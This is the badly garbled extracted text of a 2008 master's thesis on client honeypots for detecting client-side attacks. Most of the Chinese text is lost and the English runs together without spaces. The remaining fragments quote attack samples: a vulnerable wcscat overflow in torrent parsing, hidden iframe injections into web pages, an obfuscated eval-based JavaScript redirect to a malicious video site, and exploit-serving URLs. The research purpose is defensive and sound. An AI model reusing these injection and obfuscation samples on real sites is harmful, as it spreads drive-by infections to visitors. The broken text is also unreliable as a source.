硕士论文-客户端蜜罐研究与应用扩展

上海交通大学硕士学位论文客户端蜜罐研究与应用扩展姓名：樊迅申请学位级别：硕士专业：通信与信息系统指导教师：何德全20081201IP2PIIURLCapture-HPCCapture-HPCWinWordCaptureWordABSTRACTIIIClientHoneypotResearchandApplicationExtensionABSTRACTWiththequickdevelopmentofInternet,networkattackandstealingofsensitiveinformationhappenseveryday.Hackersmakeuseofdifferentsoftandhardwarevulnerabilitiestogaincontrolofservers,aswellaspenetration.Intheknowledgeofattackingskills,securityresearcherscontinuouslydoresearchindevelopingcounter-methodtotheinvasionactivities.WiththewideuseofFirewallandIntrusionDetectionSystems,traditionalattackpathofserver-sideattackfacesthereductiononsucceedratio.Asaresult,attackersturntoaeasier,andmoreconvenientwayofclient-sideattack.Traditionalhoneypotsystemsfocusondetectionofserver-sideattack,sothattheyarelessusableindetectionofclient-sideattack.Inordertoresearchanddetectclient-sideattack,securityresearchersannounceclienthoneypot.Clienthoneypotscrawlthenetwork,interactwithservers,andclassifyserverswithrespecttotheirmaliciousnature.Itsimulates,ordrivesclient-sidesoftwareanddoesnotexposeserverbasedservicestobeattacked.Itcannotlureattackstoitself,butratheritmustactivelyinteractwithremoteserverstobeattacked.Whereasallaccessestothetraditionalhoneypotaremalicious,theclient-sidehoneypotmustdiscernwhichserverismaliciousandwhichisbenign.Thispaperresearchesonclienthoneypots,introduceditsprinciple,andhasextendedtheapplicationofclienthoneypottobeabletodetectawiderrangeofclient-sideattack.Keywords:Client-sideAttack,Clienthoneypot2009225“√”20092220092211.1InternetInternet1.221.31.3.1NAT[1]1.3.23Honeyd[2][3]1-11-1Fig.1-1TraditionalHoneypots1-2Fig.1-2ClientHoneypots41-3Fig.1-3ClientHoneypotsidentifyfunction1.3.31.3.3.1wget51.3.3.21.3.3.30-day1.44LanceSpitzner20046GoogleProvosDrive-by6Download[4]ChristianSeifertHoneyC[5]MITREHoneyclient[6]HoneyMonkey[7]HoneynetCapture-HPC[8]UW[9]HoneyCInternet1.5Capture-HPCCaptureMicrosoftOfficeWord72.1InternetExplorerInternetMicrosoftWord.docInternetMicrosoftOfficeAdobeReaderFlashplayerNATweb8JavascriptVisualBasicFlashwebNAT2.1.1Microsoftmilw0rm10POC8[10]BitTorrentMicrosoftWord2.1.1.1drive-bydownloadMS06-014[13]MicrosoftDataAccessComponents(MDAC)9iframeiframejavascriptActiveXJavascriptXMLHTTPAdodb.streamShell.Application2-1ms06-014Fig.2-1ms06014exploitcode102.1.1.2BTBitTorrenttorrent[14]BitTorrentuTorrentbittorrentGeneraltorrentwcscat()torrentcreationdatecreatedbywcscat()intvuln_function(wchar_t*creation_date[],wchar_t*created_by[]){wchar_ttarget_string[500];target_string=creation_date;wcscat(target_string,“by“);wcscat(target_string,created_by);//Attackercontrolledreturntarget_string;}6wcscatcreated_bytarget_stringtorrentcreated_bytarget_stringtorrentBTtorrentBitTorrenttorrent112-2torrentFig.2-2MaliciousTorrentFileContainingAttackCodes2.1.1.3MicrosoftOfficeAdobeReaderMS06-027[15]MicrosoftOfficeWordMicrosoftWordWordsmarttagsDOCWordWord122-3ms06-027Fig.2-3ms06-027exploittool2-4Word2-4WordFig.2-4WordExploited132.1.2InternetInternetB.EXEA.EXEA.EXEB.EXEEXEABCCCABBeginUpdateResourceUpdateResourceEndUpdateResourceAPICCAB16APICreateFile14WriteFile2.2Web2.2.1WebwebwebwebJavascriptweb152.2.1.1Webweb!--CopyrightInformation--divalign=’center’class=’copyright’Poweredbyahref=(U)v1.3.1Final©2003 ahref=’’IPS,Inc./a/div/diviframesrc=’’/iframeiframesrc=’=193’/iframeInvisionPowerBoardiframeweb162-5IISFig.2-5DeployingmaliciouscodeinIISDocFooter2-5webIISiisstart.htmiisstart.htmiframesrc==0width=0/iframeiframeweb172.2.1.2webblogwebHTMLwebHTMLiframescriptHTMLHTMLHTMLSCRIPTlanguage=JavaScriptfunctionotqzyu(nemz)juyu=lo;sdfwe78=catio;kjj=n.r;vj20=2;uyty=eplac;iuiuh8889=e;vbb25=(’;awq27=;sftfttft=4;fghdh=’ht;ji87gkol=tp:/;polkiuu=/vi;jbhj89=deo;jhbhi87=zf;hgdxgf=re;jkhuift=e.c;jygyhg=om’;dh4=eval(fghdh+ji87gkol+polkiuu+jbhj89+jhbhi87+hgdxgf+jkhuift+jygyhg);je15=’);if(vj20+sftfttft==6)eval(juyu+sdfwe78+kjj+uyty+iuiuh8889+vbb25+awq27+dh4+je15);otqzyu();///SCRIPT18javascriptlocation.replace(’’)videozfree.comvideozfree.com2.2.1.3javascriptGoogleJavascriptJavascript2.2.1.419Javascriptiframe!--BeginStatBasiccode--scriptlanguage=JavaScriptsrc==JavaScript!--statbasic(ST8BiCCLfUdmAHKtah3InbhtwoWA,0);//--/scriptnoscriptahref===ST8BidmAHKthtwoWAborder=0nosavewidth=18height=18/a/noscript!--EndStatBasiccode--4://expl.info/demo.php=MS03-11&SP1://expl.info/cgi-bin/ie0606.cgi?exploit=MS03-11[16]202.2.1.5bittorrentwordInternetP2PP2P212-6Fig.2-6ResourceSharingSite’sContentSupervision2.2.2EmailWebEmailEmail22EmailWebEmail2-7Fig.